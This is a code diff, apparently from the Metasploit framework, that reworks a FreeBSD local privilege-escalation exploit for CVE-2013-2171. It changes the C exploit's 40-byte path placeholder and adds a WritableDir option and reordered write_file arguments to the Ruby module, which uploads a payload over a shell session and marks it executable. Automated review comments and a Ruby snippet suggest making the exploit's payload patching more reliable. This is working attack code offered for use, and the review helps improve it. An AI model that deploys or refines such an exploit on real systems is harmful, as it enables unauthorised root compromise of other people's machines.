diff --git a/data/exploits/CVE-2013-2171.bin b/data/exploits/CVE-2013-2171.bin
index 24177a2581..8ed0677c17 100755
Binary files a/data/exploits/CVE-2013-2171.bin and b/data/exploits/CVE-2013-2171.bin differ
diff --git a/external/source/exploits/CVE-2013-2171/exploit.c b/external/source/exploits/CVE-2013-2171/exploit.c
index b4c027a39b..0ee635d5d9 100644
--- a/external/source/exploits/CVE-2013-2171/exploit.c
+++ b/external/source/exploits/CVE-2013-2171/exploit.c
@@ -17,7 +17,7 @@ int main(int ac, char **av) {
 struct ptrace_io_desc piod;
 char *s, *d;
 int pid;
- char *bin = "/tmp/W00T"; // "W00T" is just a place holder
+ char *bin = "MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890"; // is just a place holder
 if (geteuid() == 0) {
 setuid(0);
diff --git a/modules/exploits/freebsd/local/mmap.rb b/modules/exploits/freebsd/local/mmap.rb
index 095254b56f..d0c2858a36 100644
--- a/modules/exploits/freebsd/local/mmap.rb
+++ b/modules/exploits/freebsd/local/mmap.rb
@@ -12,6 +12,7 @@ class Metasploit4 < Msf::Exploit::Local
 include Msf::Exploit::EXE
 include Msf::Post::Common
+ include Msf::Post::File
 include Msf::Exploit::FileDropper
 def initialize(info={})
@@ -49,6 +50,11 @@ class Metasploit4 < Msf::Exploit::Local
 'DisclosureDate' => "Jun 18 2013",
 }
 ))
+ register_options([
+ # It isn't OptPath becuase it's a *remote* path
+ OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
+ ], self.class)
+
 end
 def check
@@ -58,7 +64,7 @@ class Metasploit4 < Msf::Exploit::Local
 Exploit::CheckCode::Safe
 end
- def write_file(data, fname)
+ def write_file(fname, data)
 oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\"
 session.shell_command_token("printf \"#{oct_data}\" > #{fname}")
 session.shell_command_token("chmod +x #{fname}")
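Review bot: The length of the new `bin` literal is load-bearing but undocumented: mmap.rb's generate_exploit overwrites exactly these 40 bytes with `payload_fname.ljust(40, "\x00")`, so adding or dropping a character here silently desynchronises the two files, yet the trailing comment still only says it is a placeholder. Suggest replacing that comment with `// 40-byte path placeholder: mmap.rb (generate_exploit) patches it in place, keep the length in sync with its ljust(40)`. The rest of main, including whatever uses `bin`, is outside the hunk, so I cannot tell whether the code relies on the NUL terminator the padding preserves; worth a sentence in the same comment if it does.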
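Review bot: The WritableDir value registered on the `OptString.new` line is later interpolated unquoted into the `printf ... > #{fname}` and `chmod +x #{fname}` shell commands in write_file, so a value with whitespace or shell metacharacters fails the upload with an opaque error rather than a BadConfig. A validation next to the length check in upload_payload would reject it up front, e.g. `fail_with(Exploit::Failure::BadConfig, "WritableDir must be an absolute path without shell metacharacters") unless fname =~ %r{\A/[\w./-]*\z}`. The option description could also state the length limit that the fixed 40-byte placeholder imposes, since users otherwise only discover it at run time, and the comment above it has a typo (`because`).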
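Review bot: The renamed `def write_file(fname, data)` now has the same argument order as `Msf::Post::File#write_file`, which the first hunk also mixes in, and because this definition sits in the class body it overrides the mixin's version; nothing in the hunk says whether that shadowing is intended, and the next reader may delete it as a duplicate. A comment above the `def` would settle it, e.g. `# Overrides Msf::Post::File#write_file (same (fname, data) order): uploads via printf octal escapes and marks the file executable`. The method continues past the hunk, so I cannot see what it returns; `collect {|e| e.to_s(8)}` would read as `map { |e| e.to_s(8) }` in the file's idiom.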
@@ -67,10 +73,17 @@ class Metasploit4 < Msf::Exploit::Local
 return (chk =~ /ERROR: cannot open/) ? false : true
 end
+
 def upload_payload
- fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
+ fname = datastore['WritableDir']
+ fname = "#{fname}/" unless fname =~ %r'/$'
+ if fname.length > 36
+ fail_with(Exploit::Failure::BadConfig, "WritableDir can't be longer than 33 characters")
+ end
+ fname = "#{fname}#{Rex::Text.rand_text_alpha(4)}"
+
 p = generate_payload_exe
- f = write_file(p, fname)
+ f = write_file(fname, p)
 return nil if not f
 fname
 end
@@ -80,17 +93,14 @@ class Metasploit4 < Msf::Exploit::Local
 # Metasm does not support FreeBSD executable generation.
 #
 path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin")
- f = File.open(path, 'rb')
- x = f.read(f.stat.size)
- f.close
-
- x.gsub(/W00T/, File.basename(payload_fname))
+ x = File.open(path, 'rb') { |f| f.read(f.stat.size) }
+ x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00"))
 end
 def upload_exploit(payload_fname)
- fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
+ fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
 bin = generate_exploit(payload_fname)
- f = write_file(bin, fname)
+ f = write_file(fname, bin)
 return nil if not f
 fname
 end
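Review bot: The check and its message disagree: `fname.length > 36` runs after the trailing slash has been appended, so the real limit is 35 characters (36 with the slash), not the 33 the fail_with text reports, and the magic number is only explained by the 40-byte placeholder in generate_exploit. Suggest tying both to that fact: `if fname.length + 4 > 40` with `fail_with(Exploit::Failure::BadConfig, "WritableDir must be at most 35 characters: the payload path is patched into a 40-byte field")`. The `%r'/$'` anchor matches before an embedded newline; `fname.end_with?("/")` states the intent without a regex. `return nil if not f` reads as `return nil unless f` in the file's idiom.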
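Review bot: The new `x.gsub(...)` line passes `payload_fname` as a replacement string, so a backslash-digit sequence in WritableDir would be expanded as a back-reference, and nothing checks that the placeholder was actually found; a stale `CVE-2013-2171.bin` would be uploaded unpatched and run with a garbage path. The fence below uses the block form, a class-level `PATH_PLACEHOLDER = "MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890".freeze` declared outside this hunk so the 40 is not repeated, and fails early when the marker is absent. upload_exploit still hard-codes `/tmp/` while upload_payload now honours WritableDir; unless that is deliberate it should build its path the same way, ideally through one private helper, and the `rand_text_alpha(5)` to `(4)` change is unexplained. generate_exploit starts before the hunk.
```ruby
    # … unchanged: comment and path = File.join(...) …
    x = File.binread(path)
    unless x.include?(PATH_PLACEHOLDER)
      fail_with(Exploit::Failure::Unknown, "#{path} does not contain the path placeholder; rebuild it from exploit.c")
    end
    # Block form: a "\\1" in the path would otherwise be expanded as a back-reference.
    x.sub(PATH_PLACEHOLDER) { payload_fname.ljust(PATH_PLACEHOLDER.length, "\x00") }
```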